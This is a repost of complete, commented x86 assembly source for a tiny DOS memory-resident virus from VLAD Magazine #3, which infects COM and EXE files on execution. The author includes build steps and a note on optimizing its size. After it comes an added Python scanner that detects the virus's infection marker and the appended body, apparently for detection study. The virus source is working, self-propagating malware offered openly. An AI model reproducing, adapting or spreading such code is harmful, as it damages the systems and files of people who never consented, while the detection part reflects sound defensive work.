
VLAD Magazine - Issue #3 - Small Virus

Jun 28th, 2023
;---------------------------------------------------------------------------
;
; Smallest Virus I Could Manage - 263 bytes
; The Smallest Virus I Could Manage
;
; In Nuke InfoJournal #5 I foolishly boasted about a 387-byte TSR COM/EXE
; parasitic infector I'd written.. well the days of semi-lameness are gone
; (that was almost 2 years ago now) and I've come up with the goods.
;
; This is the smallest virus I could figure out at this point in time.
; In all respects, it's a fully viable spreader in the wild, although it
; does have serious 'security' problems - it doesn't trap i24 (critical
; error handler), clean registers before returning control to the host, or
; even use i21 functions by chaining on to the old vector (it calls i21
; with an INT instruction).  I have no pretenses in that I fully don't
; expect to see this in the wild, since it was only written for
; investigative pleasure anyway, to see how small a virus could be
; written.
;
; There was another version of this virus which I gave out to a few people
; on #virus, which had a slight bug (rather, hasty oversight) in it, where
; I changed a bit of code and didn't change a corresponding line a few
; lines later.. which results in the i21 vector being partially
; overwritten and thus the machine will crash (bad side effect!), which
; was 291 bytes.  The difference between this virus and the 'old' one is
; that this one doesn't change the target EXE file's stack, simply leaving
; it and negating the need to carry the extra 4 bytes around with the
; virus, as well as cutting code size.  Also, the 'old' one didn't trigger
; any heuristic flags whereas this one does.  (see below)
;
; This virus is a memory-resident parasitic infector of COM and EXE files
; on execution, 263 bytes.  It doesn't reinfect memory OR files.
;
; The older revision (sm2.asm, and the bug-fix, sm2b.asm) avoided all
; heuristic flags (except maybe suspicious stack); it inserted the delta
; offset straight into the first instruction of the virus, instead of
; doing the usual 'call $+3/pop si/sub si,3'.  However this just took up
; too much code and besides, it's going to get caught anyway, so why
; bother?  So in this version, it was removed, but the lines are only
; commented out.  If, for some reason, you want to re-enable the old
; system, uncomment the appropriate lines and delete the lines with only a
; semicolon after them (ie not the ones with actual comments!).  Enabling
; this will bring the virus size up to all 268 bytes.
;
; In its current form, I think it's as optimized as I can make it.  Apart
; from the odd 1-byte improvement, any difference would require a change
; in viral architecture.  Some hardcore processor head would have to do it,
; perhaps they'd get a virus of 260 bytes.. but below that, I'm sure it'd
; have to be deficient or unreliable in some respect (as far as I can
; rationally extrapolate, judging how limited this virus is in avoiding
; detection).  I'm certainly not saying that a smaller virus cannot be
; written, however, because it's probably possible.  If I could see how,
; though, I'd do it! :)  Making this smaller would require the removal of
; 'safety' checks (eg bailing if the file can't be opened, bailing if the
; file is less than 24 bytes, etc).  However I consider these checks to be
; part of a viable virus, so I left them in.
;
; There isn't a great deal of commenting on this virus.  A few of the
; techniques just aren't applicable to viruses of the normal kind, so
; there's no real point.  To gain anything much out of examining
; the source you more or less have to have a good idea of what's going on
; anyway.
;
;
; by T�L�N
;
; compile with a86, rename the .bin to a .com and it's ready to roll...
;

org 0
@marker equ 19h

v_start:        ; mov si, 0100h
                call $+3        ; delta offset: si = address of v_start
                pop si          ;
                sub si, 3       ;

                push ds
                xor ax, ax              ; this virus resides at the end
                mov es, ax              ; of the interrupt table & then some
                mov di, 200h
                push di
                cld
                scasw                   ; is the space clear? (0000:0200 still zero)
                pop di
                jne v_exit              ; already resident (or area in use): skip install

                push si
                mov cx, v_len
             db 02eh                    ; make CS source of movsb
                rep movsb               ; copy the virus to memory
                mov si, 21h*4           ; & save old i21 vector
                push si
             db 26h                     ; make ES source of movsw
                movsw
             db 26h
                movsw
                pop di
                mov ax, offset new21 + 200h
                stosw
                xchg ax, cx             ; cx is 0 after rep movsb: segment 0000h
                stosw                   ; capture int 21h
                pop si
v_exit:         pop es                  ; original ds (PSP segment)
                add si, offset old_shit
                pop ax                  ; COM: the 0000h word DOS pushed at the top
                or sp, sp               ; COM or EXE determination: SP wraps to 0 for a COM
                push ax
                push cs
                pop ds
                jnz exit_exe

exit_com:       mov di, 100h            ; return to COM host
                push di
                movsw                   ; restore the saved first 4 bytes at 100h
                movsw
                ret                     ; jump to 100h
exit_exe:       mov ax, es              ; return to EXE host
                add ax, 10h             ; PSP + 10h = load segment
                add word ptr [si+2], ax ; relocate the saved CS
                jmp dword ptr [si]      ; far jump to the host's original CS:IP

old_shit:       int 20h                 ; host's first 4 bytes (COM) or IP, CS (EXE)
             dw 0

new21:          cmp ax, 4b00h           ; infect on execute
                je infect
                jmp exit21

infect:         push ax
                push bx
                push cx
                push dx
                push si
                push di
                push ds
                push es

                mov ax, 3d02h           ; open the file (ds:dx = filename from caller)
                int 21h
                jc bitch

                push cs
                pop ds
                push cs
                pop es

                xchg ax, bx             ; bx = handle
                mov ah, 3fh
                mov cx, 24
                mov dx, offset signature+200h
                int 21h                ; read header
                xor cx, ax              ; cx = 0 if exactly 24 bytes were read..
                jnz bitch1              ; ..otherwise the file is too short: close & bail

                mov si, dx
                push ax                 ; 24, reused as the header write length
                mov al, @marker
                cmp byte ptr [si+3], al ; is the infection marker present?
                                        ;(com)
                je bitch2
                cmp byte ptr [si+12h], al       ; (exe)
                je bitch2

                mov ax, 4202h           ; seek to EOF  dx:ax -> file len
                cwd
                int 21h                 ; cx is already zero
                push ax                 ; low word of the file length

                mov di, offset old_shit+200h
                cmp byte ptr [si], 'M'
                je infect_exe
infect_com:     push si
                movsw                   ; save first 4 of COM
                movsw
                pop di
                mov al, 0e9             ; jmp rel16 opcode (a86: leading-0 number with A-F is hex)
                stosb
                pop ax                  ; file length
;                inc ah
;                mov word ptr [v_start+201h], ax
;                sub ax, 103h
                dec ax          ;
                dec ax          ;
                dec ax          ;
                stosw                   ; rel16 = len - 3: jumps to the appended virus
                mov byte ptr [di], @marker      ; mark infection

write_us:       mov ah, 40h
                mov cx, v_len
                mov dx, 200h
                int 21h                 ; append the virus body at EOF

write_hdr:      mov ax, 4200h
                cwd
                xor cx, cx
                int 21h                 ; seek back to offset 0

                pop cx                  ; 24
                mov ah, 40h
                mov dx, offset signature+200h
                int 21h                 ; write the modified header back

                push ax                 ; ambiguous instruction: balances the pop at bitch2

bitch2:         pop ax
bitch1:         mov ah, 3eh             ; close the handle
                int 21h
bitch:          pop es
                pop ds
                pop di
                pop si
                pop dx
                pop cx
                pop bx
                pop ax
exit21:         jmp dword ptr cs:[old21+200h]

infect_exe:     push dx                 ; high word of the file length
                push si
                mov si, offset [exe_ip+200h]
                movsw                   ; save IP, CS
                movsw
                add ax, v_len           ; calculate part_page, page_cnt
                adc dx, 0               ; of infected file
                mov cx, 200h
                div cx                  ; ax = full pages, dx = bytes in the last page
                pop di
                scasw                   ; di = page_cnt (two words past signature)
                scasw
                std                     ; a novel approach..
                or dx, dx
                jz noinc
                inc ax                  ; round up for a partial last page
noinc:          stosw                   ; store the new values..
                xchg ax, dx             ; ..backwards with DF set: page_cnt, then part_page
                stosw

                pop dx
                pop ax                  ; dx:ax = original file length
                mov cx, 10h             ; calculate # of paragraphs
                div cx                  ; in the uninfected file (dx = leftover bytes = new IP)
                sub ax, word ptr [hdr_size+200h]

                mov di, offset relo_cs+200h
                stosw                   ; & set new IP, CS (entry pt)
                xchg ax, dx
                stosw
;                mov word ptr [v_start+201h], ax
                mov ax, @marker
                stosw                   ; DF still set: lands in the checksum word at +12h
                jmp short write_us


v_end:
old21   equ     v_end + 0
signature       equ old21 + 4           ; where we load the host files header
part_page       equ signature + 2       ; part-page at EOF
page_cnt        equ part_page + 2       ; count of code pages
hdr_size        equ page_cnt + 4        ; size of header in paragraphs
minmem          equ hdr_size + 2        ; minimum memory required
maxmem          equ minmem + 2          ; maximum memory required
relo_ss         equ maxmem + 2          ; displacement of stack segment (SS)
exe_sp          equ relo_ss + 2         ; stack pointer (SP)
chksum          equ exe_sp + 2          ; -> infection marker
exe_ip          equ chksum + 2          ; instruction pointer (IP)
relo_cs         equ exe_ip + 2          ; displacement of code segment (CS)
                                        ; 24 bytes for EXE header information

v_len equ v_end - v_start

;
;-------the-end-------------------------------------------------------------

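The scanner below is an added example, not part of the VLAD listing or its author's work. It reads the same 24-byte header the virus works on (the equ table at the end of the listing) and looks for the two traces the infection routine leaves: the @marker byte at offset 3 of a COM (after the E9 jmp rel16) or the 0019h word in the EXE checksum field, plus an entry point that lands exactly v_len (263) bytes before EOF, where an appended copy would begin. The sample COM and EXE images are constructed inline for the test and contain only filler bytes, no virus code; the MARKER and V_LEN constants are taken from the listing.

```python
import struct

MARKER = 0x19   # @marker from the listing
V_LEN = 263     # v_len from the listing: the virus body is appended as the last 263 bytes

# The 24-byte MZ header prefix the virus reads into `signature` (same field order
# as the equ table in the listing; reloc_cnt at +6 is the word the table skips).
MZ_FIELDS = ("signature", "part_page", "page_cnt", "reloc_cnt", "hdr_size",
             "minmem", "maxmem", "relo_ss", "exe_sp", "chksum", "exe_ip", "relo_cs")
MZ_FMT = "<2s11H"   # 2 + 11*2 = 24 bytes


def parse_mz_header(data):
    """Split the first 24 bytes of an MZ file into the fields named above."""
    if len(data) < 24:
        raise ValueError("need at least 24 bytes")   # the virus bails out here as well
    return dict(zip(MZ_FIELDS, struct.unpack(MZ_FMT, data[:24])))


def exe_image_size(hdr):
    """File length implied by page_cnt/part_page (512-byte pages, last one partial)."""
    size = hdr["page_cnt"] * 512
    if hdr["part_page"]:
        size -= 512 - hdr["part_page"]
    return size


def exe_entry_offset(hdr):
    """File offset of the initial CS:IP: (hdr_size + relo_cs) paragraphs, plus exe_ip."""
    return (hdr["hdr_size"] + hdr["relo_cs"]) * 16 + hdr["exe_ip"]


def scan(data):
    """Classify a file the way `infect` does and report the traces it would leave.

    Returns a dict with:
      kind        'short', 'COM' or 'EXE' (the listing only tests for a leading 'M')
      marker      the @marker value sits where infect_com / infect_exe writes it
      tail_entry  the entry point lands exactly V_LEN bytes before EOF, i.e. where
                  an appended copy of the virus would begin
      entry       the entry point as a file offset (None for a COM not starting with E9)
    """
    if len(data) < 24:                     # the `xor cx, ax / jnz bitch1` path
        return {"kind": "short", "marker": False, "tail_entry": False, "entry": None}
    if data[:1] == b"M":
        hdr = parse_mz_header(data)
        entry = exe_entry_offset(hdr)
        return {
            "kind": "EXE",
            # `mov ax, @marker / stosw` leaves the word 0019h at +12h; the virus itself
            # only compares the low byte, so it would also skip a file with 0x??19 here.
            "marker": hdr["chksum"] == MARKER,
            "tail_entry": entry == len(data) - V_LEN and exe_image_size(hdr) == len(data),
            "entry": entry,
        }
    entry = None
    if data[0] == 0xE9:                    # jmp rel16 at offset 0
        rel = struct.unpack("<h", data[1:3])[0]
        entry = (3 + rel) & 0xFFFF         # relative to the next instruction, 16-bit wrap
    return {
        "kind": "COM",
        "marker": data[0] == 0xE9 and data[3] == MARKER,   # E9 xx xx 19h
        "tail_entry": entry == len(data) - V_LEN,
        "entry": entry,
    }


def _mz(total_len, hdr_paras, ip, cs, chksum):
    """Build a minimal MZ header (constructed test data, not a real program)."""
    page_cnt, part = divmod(total_len, 512)
    if part:
        page_cnt += 1                      # same rounding as `or dx, dx / jz noinc / inc ax`
    hdr = struct.pack(MZ_FMT, b"MZ", part, page_cnt, 0, hdr_paras,
                      0, 0xFFFF, 0, 0x100, chksum, ip, cs)
    return hdr + b"\x00" * (hdr_paras * 16 - 24)


# Constructed samples.  The "infected" ones reproduce only the header edits the
# listing makes; the appended V_LEN bytes are 0CCh filler, not virus code.
CLEAN_COM = b"\xB4\x4C\xCD\x21" + b"\x90" * 60           # mov ah,4Ch / int 21h, padded to 64 bytes
INFECTED_COM = (b"\xE9" + struct.pack("<H", len(CLEAN_COM) - 3) + bytes([MARKER])
                + CLEAN_COM[4:] + b"\xCC" * V_LEN)
CLEAN_EXE = _mz(96, 2, 0, 0, 0) + b"\xC3" * 64             # 32-byte header + 64 bytes of code
INFECTED_EXE = (_mz(96 + V_LEN, 2, 0, 96 // 16 - 2, MARKER)  # IP = 96 mod 16, CS = 96/16 - hdr_size
                + b"\xC3" * 64 + b"\xCC" * V_LEN)

if __name__ == "__main__":
    for name, blob in (("clean.com", CLEAN_COM), ("infected.com", INFECTED_COM),
                       ("clean.exe", CLEAN_EXE), ("infected.exe", INFECTED_EXE)):
        print(name, scan(blob))
```

The tail_entry check is the more robust of the two signals: a marker value can appear in a clean file by chance, but an entry point that sits exactly 263 bytes before EOF while page_cnt/part_page still describe the whole file is the layout this appender produces. Because the virus rounds page_cnt up from the new length and stores the remainder in part_page, the image-size check also catches files whose header was patched without the body being appended.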